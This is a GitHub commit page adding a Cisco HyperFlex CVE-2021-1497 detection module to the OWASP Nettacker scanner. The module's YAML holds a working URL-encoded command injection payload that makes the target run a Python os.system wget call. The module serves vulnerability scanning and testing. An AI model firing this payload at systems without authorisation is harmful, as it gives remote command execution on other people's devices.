-
-
Notifications
You must be signed in to change notification settings - Fork 780
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #471 from OWASP/CVE-2021-1497
add new module cisco CVE 2021 1497
- Loading branch information
Showing
2 changed files
with
60 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
info: | ||
name: cisco_hyperflex_cve_2021_1497_vuln | ||
author: OWASP Nettacker Team | ||
severity: 9.8 | ||
description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-1497 | ||
- https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html | ||
profiles: | ||
- vuln | ||
- vulnerability | ||
- http | ||
- high_severity | ||
- cve | ||
- hyperflex | ||
- cisco | ||
|
||
payloads: | ||
- library: http | ||
verify: false | ||
timeout: 10 | ||
cert: "" | ||
stream: false | ||
proxies: "" | ||
steps: | ||
- method: post | ||
headers: | ||
Accept: "*/*" | ||
Content-Type: application/x-www-form-urlencoded | ||
User-Agent: "{user_agent}" | ||
allow_redirects: false | ||
url: | ||
nettacker_fuzzer: | ||
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}" | ||
prefix: "" | ||
suffix: "" | ||
interceptors: | ||
data: | ||
paths: | ||
- 'auth/change' | ||
- 'auth' | ||
schema: | ||
- "http" | ||
- "https" | ||
ports: | ||
- 80 | ||
- 443 | ||
data: username=root&password=123%5C%22%2C%5C%22%246%24%24%5C%22%29%29%3Bimport%20os%3Bos.system%28%5C%22wget%20http%3A%2F%2F%7B%7B{target}%7D%7D%5C%22%29%3Bprint%28crypt.crypt%28%5C%22 | ||
response: | ||
condition_type: and | ||
conditions: | ||
status_code: | ||
regex: "200" | ||
reverse: false | ||
content: | ||
regex: "http" | ||
reverse: false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters